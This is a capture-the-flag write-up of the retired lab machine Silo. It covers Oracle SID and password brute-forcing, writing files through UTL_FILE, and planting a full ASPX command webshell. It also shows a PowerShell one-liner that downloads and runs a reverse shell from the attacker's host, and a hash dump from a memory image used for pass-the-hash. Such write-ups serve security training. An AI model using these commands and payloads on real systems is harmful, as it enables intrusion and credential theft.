This is the write-up for the box Silo that got retired at the 4th August 2018. My IP address was 10.10.14.4 while I did this.
Let's put this in our hosts file:
10.10.10.82 silo.htb
Starting with a Nmap scan:
nmap -sC -sV -o nmap/silo.nmap 10.10.10.82
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49160/tcp open oracle-tns Oracle TNS listener (requires service name)
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
On the web page there is the default IIS page. Lets search for hidden directories with Gobuster:
gobuster -u http://10.10.10.82 dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
It finds nothing.
In order to attack the Oracle Database I will use a tool called ODAT (Oracle Database Attacking Tool). First we need to know the SID of the database:
odat sidguesser -s 10.10.10.82 -p 1521
This can also be done with the Metasploit module auxiliary/scanner/oracle/sid_brute. Both of the tools will find two SIDs:
- XE
- XEXDB
The next thing to get is a password and ODAT can try to brute-force this. It needs a password list which I will take from /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt and modify so that it has a backslash between username and password.
odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file oracle_default_userpass.txt
After it finishes, one valid credential is found: scott/tiger.
Connecting to the Oracle database with the found credentials:
sqlplus64 scott/tiger@10.10.10.82:1521/XE
Enumerating the database:
SQL> select * from session_privs
SQL> select * from user_role_privs
These commands don't show much but it is possible to login on the database as sysdba:
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba
Now the commands show a lot more information and we can exploit the Oracle database.
With these privileges it is possible to read files from the file system.
SQL> set serveroutput ON
declare
f utl_file.file_type;
s varchar(200);
begin
f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
/
This shows the contents of the default IIS page and can be done for any file on the file system like the flags.
A way to gain access to the server is by uploading a webshell on the IIS web server and executing commands to gain a reverse shell. The webshell I upload is an ASPX shell from /usr/share/webshells/aspx/cmdasp.aspx. This script has to be made smaller to under 1000 characters or otherwise it can't be written to the file system:
- Remove tags and contents
- Remove style tags
- Remove comments
- Remove newlines:
sed -z 's/\n//g' cmdasp.aspx
Now writing it to the file system from the SQL command line:
declare
f utl_file.file_type;
s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
f := utl_file.fopen('/inetpub/wwwroot', 'shell.aspx', 'W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
The webshell can be found on:
http://10.10.10.82/shell.aspx
It is possible to execute any command so lets start a reverse shell:
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.4/Invoke-PowerShellTcp.ps1')"
After executing the reverse shell Invoke-PowerShellTcp.ps1 from the Nishang framework gets called from my web server and the listener on my IP and port 9001 starts a reverse shell session as IIS APPPOOL/defaultapppool.
In the home directories there is one user Phineas and he has a file called "Oracle issue.txt" in his Desktop directory with the following content:
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$
When browsing to the Dropbox URL and pasting the given password, it won't work. The reason is because one of the characters is UTF-8 encoded but our terminal only shows ASCII. This can be bypassed by encoding the contents of the file to Base64 and decode it to UTF-8 instead of ASCII.
$content = Get-Content "Oracle issue.txt"
$encoded = [System.Text.Encoding]::UTF8.GetBytes($content)
[System.Convert]::ToBase64String($encoded)
Decoding the Base64 string:
echo -n 'U3VwcG9ydCB2ZW5kb3IgZW5nYWdlZCB0byB0cm91Ymxlc2hvb3QgV2luZG93cyAvIE9yYWNsZSBwZXJmb3JtYW5jZSBpc3N1ZSAoZnVsbCBtZW1vcnkgZHVtcCByZXF1ZXN0ZWQpOiAgRHJvcGJveCBsaW5rIHByb3ZpZGVkIHRvIHZlbmRvciAoYW5kIHBhc3N3b3JkIHVuZGVyIHNlcGFyYXRlIGNvdmVyKS4gIERyb3Bib3ggbGluayAgaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2gvNjlza3J5emZzemI3ZWxxL0FBRFpuUUViYnFEb0lmNUwyZDBQQnhFTmE/ZGw9MCAgbGluayBwYXNzd29yZDogwqMlSG04NjQ2dUMk' | base64 -d
Now it shows the real password that can be used for Dropbox:
£%Hm8646uC$
The file to download is a ZIP archive and the content is one file called SILO-20180105-221806.dmp.
Using the file
command to analyze it:
SILO-20180105-221806.dmp: MS Windows 64bit crash dump, full dump, 261996 pages
This Windows crash dump can be analyzed with different tools and I will use Volatility. Lets collect some information about the image and dump the hashes:
volatility -f SILO-20180105-221806.dmp imageinfo
volatility -f SILO-20180105-221806.dmp Win2012R2x64 pstree
volatility -f SILO-20180105-221806.dmp Win2012R2x64 hashdump
Dumped hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
With the hash of the Administrator we can do a Pass-The-Hash attack to authenticate on the box:
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd
After successfully passing the hash to the box, it starts a shell session as Administrator!